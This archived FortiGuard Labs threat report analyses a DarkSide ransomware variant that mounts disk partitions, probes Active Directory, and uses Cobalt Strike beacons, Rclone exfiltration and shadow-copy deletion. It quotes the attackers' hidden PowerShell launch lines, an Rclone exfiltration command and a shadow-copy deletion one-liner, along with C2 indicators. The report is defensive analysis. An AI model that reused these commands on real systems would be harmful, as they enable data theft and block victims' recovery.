{
	"id": "56a82c00-3449-49cc-bbe8-939db161baed",
	"created_at": "2026-04-06T00:08:48.308972Z",
	"updated_at": "2026-04-10T13:11:41.821938Z",
	"deleted_at": null,
	"sha1_hash": "4e418e297510b14664977451a73814368d6c296e",
	"title": "Newly Discovered Function in DarkSide Ransomware Variant Targets Disk Partitions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 946846,
	"plain_text": "Newly Discovered Function in DarkSide Ransomware Variant\r\nTargets Disk Partitions\r\nPublished: 2021-05-17 · Archived: 2026-04-05 13:03:23 UTC\r\nFortiGuard Labs Threat Research Report\r\nAffected Platforms: Windows\r\nLevel of Risk: HIGH/MEDIUM. This ransomware variant, written by the same criminals that targeted Colonial\r\nPipeline, exhibits the ability to detect and compromise partitioned hard drives, a behavior not seen before.\r\nImpact: MEDIUM. This attack currently appears to be confined to targeted organizations and is not the result of\r\nwidespread wormlike activity.\r\nIntroduction of DarkSide Ransomware\r\nFortiGuard Labs has uncovered additional tactics used by the threat actors that attacked Colonial Pipeline. In this\r\ndifferent DarkSide ransomware variant, FortiGuard Labs researchers uncovered an ability to seek out partition\r\ninformation and compromise multiple disk partitions. \r\nAt the time of discovery, FortiGuard Labs researchers believed the ransomware was seeking out partitions to find\r\npossible hidden partitions set up by systems administrators to hide backup files. But further analysis confirmed an\r\neven more advanced technique. The DarkSide Ransomware variant seeks out partitions on a multi-boot system to\r\nfind additional files to encrypt, thereby causing greater damage and an increased incentive to pay a ransom to\r\nrecover files.\r\nIn this blog the reader will discover:\r\n1. DarkSide ransomware code is efficient and well-constructed, indicating that their cybercriminal\r\norganization includes experienced software engineers\r\n2. The DarkSide ransomware variant (NOT the version used to disrupt Colonial Pipeline operations) is\r\nadvanced in nature and was observed to seek out partitions in a multi-boot environment to create further\r\ndamage. It also seeks out the domain controller and connects to its Active Directory via LDAP anonymous\r\nauthentication.\r\n3. 
Additional insight on the files used by, and associated with, DarkSide was uncovered by the FortiGuard\r\nIncident Response team during recent engagements.\r\n4. The use of a well-known (to threat researchers) bulletproof host that has been used by a wide variety of\r\nmalicious actors for numerous nefarious activities over the years, including the 2016 DNC elections attack\r\nin the United States.\r\nExpanded Analysis of the DarkSide Ransomware Variant by FortiGuard Labs\r\nhttps://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions\r\nPage 1 of 13\n\nFortiGuard Labs encountered novel techniques in this DarkSide ransomware variant that have\r\nnot been seen before in ransomware. The DarkSide ransomware variant[1] was obtained through our partnership with\r\nCTA. \r\nThis ransomware sample, unrelated to the Colonial Pipeline campaign, was programmed efficiently with very\r\nlittle wasted space, and compiler bloat has been kept to a minimum, which is unusual for most malware. While the\r\nfile size is relatively small for malware (57,856 bytes), it can deliver a much-larger-than-expected payload. The\r\nfollowing section will look closer at two of the more unique functions that this DarkSide variant carries out. One\r\ndeals with Active Directory and the other is concerned with partitions. \r\nMalicious actors know that Active Directory is basically a goldmine of network information. In this campaign, the\r\nDarkSide group included an Active Directory attack in their ransomware software. To accomplish this, it first\r\nattempts to look for domain controllers. \r\nFigure 1: finding domain controllers\r\nIf any domain controllers are found, it will then use them to try and connect to the Active Directory. 
However,\r\nbecause permissions are usually required to do this, the DarkSide ransomware variant attempts to use LDAP to\r\nauthenticate anonymously. Note the use of a null password and a null username in the following sequence:\r\nFigure 2: LDAP anonymous authentication\r\nThis DarkSide ransomware variant may then use COM to interface with Active Directory itself. If successful, the\r\nmalware attempts to delete certain variables, such as defaultNamingContext and dnsHostName. \r\nAfter issuing Active Directory queries, the ransomware then attempts to encrypt files in network shares found in\r\nthis section of the code. Note that DarkSide makes a point to avoid shares named C$ and ADMIN$, and also first\r\nchecks to see if a share is writeable before trying to encrypt files in it. C$ and ADMIN$ are default and known\r\nadmin shares, which are supposed to only be accessible by members of the Administrators group or the Backup\r\nOperators group if they have not been disabled or reconfigured. It seems likely that DarkSide avoids these shares\r\non the chance that it may not be running in the context of an Administrator and attempts to access them could\r\npotentially trigger an alert.\r\nA more unique operation was found elsewhere. In a similar fashion to Petya (also known as NotPetya)\r\nransomware, DarkSide also scans the hard drive to perform additional actions. In the case of Petya, the MBR\r\n(Master Boot Record) was infected so that when a user turned on the computer it booted a ransom note straight\r\nfrom the MBR and essentially rendered the computer useless. (For more information on how this was done, please\r\nrefer to our Petya blog here.) In the case of the DarkSide ransomware, however, it scans the drive to see if it is a\r\nmulti-boot system to find additional volumes/partitions to try and encrypt their files as well. 
(NOTE: While the\r\ntechnical definitions of partition and volume are different, the two will be used interchangeably for the purposes of\r\nthis blog.)\r\nFigure 3: Loop through volumes\r\nAfter the malware finds a targeted drive type, it checks the version of Windows it is running on. For systems\r\nrunning Windows 7 and above, the malware looks for volumes with a bootmgr file in them. The bootmgr file may be\r\nfound in the root of the C:\\ drive or it may be stored in another volume.\r\nFigure 4: Newer OS\r\nFor systems older than Windows 7, DarkSide chooses a different approach. It calls the DeviceIoControl API using\r\nthe IOCTL_DISK_GET_PARTITION_INFO_EX control code. (Incidentally, Petya also used this control code.\r\nSome of the similarities between the two attacks are quite interesting.) According to Microsoft, this control code\r\nretrieves extended information about the type, size, and nature of a disk partition. This DarkSide ransomware\r\nvariant, however, uses the results in a different manner.\r\nFigure 5: Partitions\r\nIf the partition style it finds is an MBR (Master Boot Record), it will go ahead and check to see if this partition is\r\nbootable. If not, then it will try to mount the partition. This appears to be a programming bug, as bootable\r\npartitions may contain databases and other relevant data. 
Perhaps DarkSide is looking to only encrypt files inside\r\ndata partitions rather than those found in bootable partitions.\r\nFigure 6: Possible MBR bug\r\nHowever, if the partition style is GPT (GUID [Globally Unique Identifier] Partition Table), DarkSide takes\r\nanother step. The first entry in a GUID partition’s format is the partition’s type, and as expected, it is defined by a\r\nGUID.\r\nPartition Definition: GUID\r\nEFI System: {C12A7328-F81F-11D2-BA4B-00A0C93EC93B}\r\nWindows Recovery Environment: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}\r\nFigure 7: Partition types\r\nIf either of these GUIDs matches the results from the call to the DeviceIoControl API, then DarkSide skips these\r\npartitions and moves on to the next one. (Unlike Petya, it appears that DarkSide at least wants to leave the infected\r\nmachines in a semi-recoverable state for obvious reasons.) At this point (whether an MBR data partition or a non-excluded GPT volume), DarkSide goes ahead and attempts to mount the partition using the\r\nSetVolumeMountPointW API. Once a volume is successfully mounted, DarkSide then attempts to encrypt the files\r\ncontained within.\r\nAs far as we have been able to determine, these actions are new to the ransomware scene. As a result, the global\r\ncyber security community may not be properly protected against this attack strategy. \r\nAdditional Files Observed Being Used in an Alternate DarkSide Ransomware\r\nCampaign\r\nWhile the above sample came from trusted partners, the FortiGuard Incident Response team has observed other\r\nactivities related to the DarkSide cybercriminals. The details gained from these observations shed additional light\r\non the tactics and techniques used by the DarkSide cybercriminals. 
For example, they provide further insight into\r\ntheir usage of an SMB beacon, an HTTPS beacon, an exfiltration component using a command line tool named\r\nRclone, WMI activity, and malware execution.\r\nSMB and HTTPS Beacon\r\nFurther analysis of an SMB beacon used by DarkSide reveals Cobalt Strike PowerShell code. Here, the\r\nenvironment variable %COMSPEC% has the value of “C:\\Windows\\System32\\cmd.exe” and provides command\r\nline arguments, unbeknownst to the user and to evade detection, that start the PowerShell application minimized\r\nwithout creating a new window. The encoded PowerShell code is the Cobalt Strike SMB Beacon payload:\r\n%COMPSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand \u003cEncoded SMB Beacon\r\npayload\u003e\r\nThe decoded PowerShell command creates a named pipe, “\\\\.\\pipe\\UIA_PIPE_”, in its SMB beacon\r\ncommunication. The pipe is bi-directional; both server and client processes can read from and write to the pipe:\r\nCreateNamedPipeA(\\\\.\\pipe\\UIA_PIPE_xxxx, 3, 6, 1, 4b000, 4b000, 0, 0)\r\nAnother finding is the discovery of an HTTPS Beacon. The following PowerShell command runs the HTTPS\r\nBEACON payload on hosts that connect outbound to the malware’s Command and Control (C2) server located at\r\nIP (185.180.197[.]86). It does this using the command InternetConnectA(server:tailgatethenation.com, port: 443,\r\n). \r\n%COMPSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand \u003cEncoded HTTPS Beacon\r\npayload\u003e\r\nThis C2 IP address, 185.180.197[.]86, was very active in 2019, and was observed again on 2021-04-19 after a long\r\npause. We do not know why this IP address remained dormant for over a year.\r\nFigure 11. 
Historical traffic from 2019 – 2021 for 185.180.197[.]86\r\nThe passive DNS entries for the C2 IP 185[.]180[.]197[.]86 are listed below. Other threat researchers have\r\nreported this IP being used by DarkSide, and this gives some insight into the kinds of data it is used for. As can be\r\nseen, prior to its use as a C2 server for ransomware, it was primarily used for pornography.\r\nFigure 12. Historical passive DNS entries for 185.180.197[.]86\r\nFurther Examination of the DarkSide Ransomware C2 IP\r\nUpon further examination, the 185[.]180[.]197[.]86 IP address was found to be co-located in the United States\r\nwith KingServers B.V. KingServers has been classified as a bulletproof host by the infosec community, and\r\nalthough based in the Netherlands, it has ties to Russia, where DarkSide is located.\r\nBulletproof hosting is a service provided by some hosting firms that provides considerable leniency in the kinds of\r\nmaterial uploaded and distributed by their customers, or in the activities they can engage in without getting taken\r\ndown. KingServers is a hosting site well known to the InfoSec community and has been covered extensively by\r\nsecurity journalist Brian Krebs among others. Specifically, its hosting service was used in several notable attacks,\r\nsuch as attacks on an India-based IT outsourcing firm to perpetrate gift card fraud, as well as for the 2016 DNC\r\nattacks in the United States.\r\nReview of observed telemetry over a 30-day period highlights a concentration of traffic from U.S.-based machines\r\nconnecting to the DarkSide C2 server, with the United States at the top (60%), followed by the Netherlands (9%),\r\nSingapore (8%), Brazil (4%), and Great Britain (4%). 
This corresponds to reports that Darkside netted at least $60\r\nmillion in its first seven months, with $46 million coming in the first three months of this year.\r\nFigure 13. Traffic to 185[.]180[.]197[.]86 over 30 days\r\nFigure 14. Port 443 Traffic to 185.180.197[.]86 over 30 days\r\nThe Darkside ransomware attackers established command and control primarily with an RDP client running over\r\nPort 443, routed through TOR. Connections between Port 443 and the C2 server 185[.]180[.]197[.]86:443 over a\r\n30-day period reveal a concentration of traffic from U.S.-based machines, with the United States at the top (82%),\r\nfollowed by the Netherlands (9%), with Great Britain, Iceland, and the Philippines/Switzerland (tied) rounding out\r\nthe top 5 pings.\r\nExfiltration\r\nA Windows task discovered during our analysis shows how data exfiltration was initiated. It was performed using\r\nRclone, a command line tool used to sync files and directories between a local system and cloud storage. In this\r\ncase, the Rclone binary was renamed to evade detection and dropped into the directory “C:\\Users\\Public\\”. The\r\nthreat actor was looking to exfiltrate files created in the last year in the file formats of .xls, .xlsx, .doc, .docx, and\r\n.pdf.\r\nRclone copy \u003csource\u003e \u003cdest\u003e --max-age 1y --ignore-existing --drive-chunk-size 512M --buffer-size=4G --transfers\r\n20 --checkers 40 --include *.{xls,xlsx,doc,docx,pdf}\r\nWMI Activity\r\nTo thwart data recovery, the ransomware payload attempted to access the Windows Management Instrumentation\r\n(WMI) service. 
\r\nFurther compounding the impact of the attack, the following de-obfuscated PowerShell command was discovered:\r\n“Get-WmiObject W32_Shadowcopy | ForEach-Object {$_.Delete();}” \r\nIt used the PowerShell cmdlet Get-WmiObject to delete all the Volume Shadow copies to thwart data recovery.\r\nMalware Execution\r\nPsExec, a remote administration tool, was seen running the main malware payload (.exe). The ransomware\r\npayload (.dll) was hosted on a shared folder, and a batch script was run to copy the payload to the host’s\r\nC:\\Users\\Public directory. This payload was executed using rundll32, and a service was created to maintain\r\npersistence. There were multiple encryption routines within the worker process, and the encryption routines were\r\ncalled directly to perform encryption and create ransomware artifacts.\r\nDarkSide Ransomware Conclusion\r\nThis blog highlights that the threat actors behind DarkSide are not your average ransomware-as-a-service group.\r\nDue to the sophistication of its attacks and code, it is also unlikely to be the work of a single mastermind. 
The level of\r\ndetail, effort, planning and time that the group has undertaken, not only creating the ransomware itself, but taking\r\nthe time to note what data was stolen, the amount of data, what it contained (as well as how much data in GB),\r\nand the time taken to organize and shame victims all highlight that this is the work of an organization with considerable\r\nresources and time.\r\nFor introductory insights into DarkSide relating to the Colonial Pipeline attack, please refer to our\r\nprevious blog and Threat Signal reports.\r\nFortinet Protections\r\nFortiGuard Labs\r\nFortiGuard Labs has the following AV signatures in place for publicly available DarkSide Ransomware and\r\nassociated campaign samples:\r\nPossibleThreat\r\nRiskware/Agent\r\nRiskware/PCH\r\nRiskware/PowerTool\r\nRiskware/RemoteUtilities\r\nRiskware/TorTool\r\nW32/DarkSide.B!tr.ransom\r\nW32/Filecoder.ODE!tr.ransom\r\nW32/Filecoder_DarkSide.A!tr\r\nW32/Filecoder_DarkSide.B!tr\r\nW32/GenKryptik.FBOV!tr\r\nW32/Packed.OBSIDIUM.BV!tr\r\nW64/Kryptik.BVR!tr\r\nFortiGuard Labs has the following IPS signature in place for Cobalt Strike Beacon activity:\r\nBackdoor.Cobalt.Strike.Beacon\r\nFor TOR (darkweb) activity, FortiGuard Labs Application Control signatures detect all TOR-related activity.\r\nFortiEDR\r\nAll related IOCs have been added to our Cloud intelligence and will be blocked if executed on customer systems.\r\nFortiEDR detects and blocks the WMI service access operation cited above, as follows:\r\nFortiEDR also detects and blocks “Rundll32.exe”, which is used to execute the ransomware worker process.\r\nWebFiltering\r\nAll available network IOCs are blocked by the client.\r\nOther 
Mitigations\r\nDue to the ease of disruption and potential for damage to daily operations, reputation, and the unwanted release of\r\npersonally identifiable information (PII), etc., it is essential to keep all AV and IPS signatures up to date.\r\nIt is also vital to ensure that all known vendor vulnerabilities within an organization are addressed and updated to\r\nprotect against attackers establishing a foothold within a network.\r\nSince most ransomware attacks originate with a compromised end user, organizations are also encouraged to\r\nconduct ongoing training sessions to educate and inform personnel about the latest phishing/spearphishing attacks.\r\nThey also need to encourage employees to never open attachments from someone they don't know and always\r\ntreat emails from unrecognized/untrusted senders with caution. This can be accomplished through regular training\r\nsessions and impromptu tests using predetermined templates by an organization's internal security department.\r\nSimple user awareness training on how to spot emails with malicious attachments or links could also help prevent\r\ninitial access into the network.\r\nLearn more about Fortinet’s FortiGuard Labs threat research and intelligence organization and the FortiGuard\r\nSecurity Subscriptions and Services portfolio.\r\nLearn more about Fortinet’s free cybersecurity training, an initiative of Fortinet’s Training Advancement Agenda\r\n(TAA), or about the Fortinet Network Security Expert program, Security Academy program, and Veterans\r\nprogram.\r\nLearn more about FortiGuard Labs global threat intelligence and research and the FortiGuard Security\r\nSubscriptions and Services portfolio.\r\n[1] SHA256: 0a0c225f0e5ee941a79f2b7701f1285e4975a2859eb4d025d96d9e366e81abb9\r\nSource: 
https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions"
	],
	"report_names": [
		"newly-discovered-function-in-darkside-ransomware-variant-targets-disk-partitions"
	],
	"threat_actors": [],
	"ts_created_at": 1775434128,
	"ts_updated_at": 1775826701,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4e418e297510b14664977451a73814368d6c296e.pdf",
		"text": "https://archive.orkl.eu/4e418e297510b14664977451a73814368d6c296e.txt",
		"img": "https://archive.orkl.eu/4e418e297510b14664977451a73814368d6c296e.jpg"
	}
}